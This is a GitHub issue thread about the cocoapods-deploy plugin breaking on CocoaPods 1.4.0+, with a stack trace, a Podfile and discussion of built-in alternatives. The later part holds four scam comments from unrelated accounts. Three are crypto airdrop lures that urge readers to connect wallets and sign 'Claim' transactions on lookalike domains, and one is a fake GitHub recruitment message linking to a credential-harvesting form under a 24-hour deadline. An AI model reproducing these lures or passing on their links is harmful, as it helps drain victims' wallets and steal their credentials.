### ISSUE TITLE
Cocoapods 1.4.0+ is broken

### ISSUE THREAD

**Issue by NiltiakSivad** [jcampbell05/cocoapods-deploy#11]
Hello,

I've been using your handy little tool with Cocoapods 1.3.1, but after trying to upgrade to Cocoapods 1.5.2, I get an error. I also verified that it is broken for Cocoapods 1.4.0. Both result in the following error:

### Command

```
/usr/local/bin/pod deploy
```

### Stack

```
   CocoaPods : 1.5.2
        Ruby : ruby 2.3.3p222 (2016-11-21 revision 56859) [universal.x86_64-darwin17]
    RubyGems : 2.5.2
        Host : Mac OS X 10.13.4 (17E199)
       Xcode : 9.3.1 (9E501)
         Git : git version 2.15.1 (Apple Git-101)
Ruby lib dir : /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib
Repositories : 
```

### Plugins

```
cocoapods-deintegrate : 1.0.2
cocoapods-deploy      : 0.0.12
cocoapods-plugins     : 1.0.0
cocoapods-search      : 1.0.0
cocoapods-stats       : 1.0.0
cocoapods-trunk       : 1.3.0
cocoapods-try         : 1.1.0
```

### Podfile

```ruby
platform :ios, '10.0'

target 'TestProject' do
  # Comment the next line if you're not using Swift and don't want to use dynamic frameworks
  use_frameworks!

  # Pods for TestProject

  pod 'RxSwift', '4.1.2'
  pod 'Moya/RxSwift', '11.0.2'
  pod 'Nuke', '6.1.1'

  target 'TestProjectTests' do
    inherit! :search_paths
    # Pods for testing
  end

  target 'TestProjectUITests' do
    inherit! :search_paths
    # Pods for testing
  end
end
```

### Error

```
ArgumentError - wrong number of arguments (given 1, expected 0)
/Library/Ruby/Gems/2.3.0/gems/cocoapods-deploy-0.0.12/lib/cocoapods-deploy/deploy_installer.rb:3:in `create_analyzer'
/Library/Ruby/Gems/2.3.0/gems/cocoapods-1.5.2/lib/cocoapods/installer.rb:147:in `resolve_dependencies'
/Library/Ruby/Gems/2.3.0/gems/cocoapods-1.5.2/lib/cocoapods/installer.rb:116:in `install!'
/Library/Ruby/Gems/2.3.0/gems/cocoapods-deploy-0.0.12/lib/cocoapods-deploy/command/deploy.rb:131:in `install'
/Library/Ruby/Gems/2.3.0/gems/cocoapods-deploy-0.0.12/lib/cocoapods-deploy/command/deploy.rb:142:in `run'
/Library/Ruby/Gems/2.3.0/gems/claide-1.0.2/lib/claide/command.rb:334:in `run'
/Library/Ruby/Gems/2.3.0/gems/cocoapods-1.5.2/lib/cocoapods/command.rb:52:in `run'
/Library/Ruby/Gems/2.3.0/gems/cocoapods-1.5.2/bin/pod:55:in `<top (required)>'
/usr/local/bin/pod:22:in `load'
/usr/local/bin/pod:22:in `<main>'
```

**Comment by jcampbell05** [comment]
Thanks for the bug report :) Looks like some of the internals we are using for the tool have changed in Cocoapods. Hopefully not a big change but I'll investigate :)

**Comment by NiltiakSivad** [comment]
@jcampbell05 Probably not an easy fix?

**Comment by jcampbell05** [comment]
@NiltiakSivad it looks like they have tidied up some of the class names. potentially easy but I haven't found the time to look into this yet

**Comment by ManWithBear** [comment]
Any progress so far?

**Comment by jcampbell05** [comment]
@ManWithBear I haven't had the time to look at this. Happy for someone to take over this.

**Comment by igor-makarov** [comment]
CocoaPods have added this functionality built-in since verison 1.6.0. Perhaps it's better to use that?

**Comment by Lutzifer** [comment]
@igor-makarov How do I do it in cocoa pods then? --deployment is a different kind of thing, isn't it?

**Comment by jcampbell05** [comment]
There is a slight difference, the new flag cocoapods just lets you know if something has changed. This framework works more like bundle where it finds the direct url for the pod and installs it rather than cloning an entire repo.

I have an issue open to integrate this into cocoapods itself but I didn't find the time to make it happen. Maybe if I have some spare time I may just integrate this into cocoapods and open a PR for them.

**Comment by Lutzifer** [comment]
@jcampbell05 thanks for the plugin. I tried some hacking on the code yesterday to get the plugin to run (which succeeded) but the resulting workspace/project had some issues.
Would be a great addition to cocoapods imho.

**Comment by jcampbell05** [comment]
I've tried suggesting they implement this functionality but they haven't been keen in the past. I think they are working to speed things up though

**Comment by igor-makarov** [comment]
I made another plugin that speeds up pod installation from GitHub:

https://github.com/igor-makarov/cocoapods-git-tarball

I'm thinking, together with CDN specs and `--deployment` this plugin covers all the cases, no? 
Also, you could add the CP cache directory to the CI caching step and it'll be very performant!

**Comment by jcampbell05** [comment]
I'll have a look but potentially this would solve the issues. Does your plugin allow you to use the faster method only when installing and not when updating ? IS that what you mean't by `--deployment` ?

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by santhosh-trillionthoughts** [comment]
### LayerZero x Google Cloud Airdrop 2024: Exclusive $ZRO Tokens 🚀

Welcome to the groundbreaking LayerZero x Google Cloud Airdrop for 2024! Get ready to seize your share of $ZRO tokens in this unprecedented collaboration. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/0*OZiVjlR298BNDURV.png)

### Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Excitement:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&title=LayerZero+Google+Cloud+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero x Google Cloud Airdrop and secure your $ZRO tokens.

Don't miss out on this futuristic collaboration – claim your tokens now and ride the wave of LayerZero innovation with Google Cloud!

**Comment by jigar-jstechno** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by jmperezv** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @kushinn, @soywiz, @bestpika, @kmazurek, @pawanmishra-kiwi, @jiangtao89, @lucasclerissepro, @devurandom, @tagyro, @RuanAragao, @SionInory, @fjtnylk, @brandonwastaken, @jwr, @RalphHightower, @shaojiankui, @Kreshnik, @thehonestcto, @NeoChow, @YuriDenison, @gpedro, @ShuchenDai, @MaximeSarrato, @Antisunny, @tyfanderw, @wenpp, @ioKun, @want-gone, @Vixb1122, @ekmixon, @shimonamit, @vitalyraevsky, @zhaojunhai, @WhiteGoldPanda, @attila-lin, @Christophe-at-axa, @martyanov, @slashsbin, @kigawas, @unthinkable, @jcampbell05, @jklmli, @ytzhang, @lcpinqin, @mw866, @stevebang, @iwenzhou, @turtleship69, @wqdygkd, @pavelbaramov

**Comment by PuchkovaAnastasia** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
kevinqmcdonald, @leijie2015, @elranu, @HappyKourosh, @tanyacui, @Enigmatic331, @libertyAlone, @cdpzyafk, @JamesonBR, @EhsanRahbari, @cartosquare, @rymalia, @lofxf, @pcoffey, @DonorToken, @chanharryhk, @UltimoTG, @KiNGxMiDAS, @PrashantBtkl, @l0z0l

**Comment by WhiteGoldPanda** [comment]
Spam …

Best regards
Bogdan Klymenko
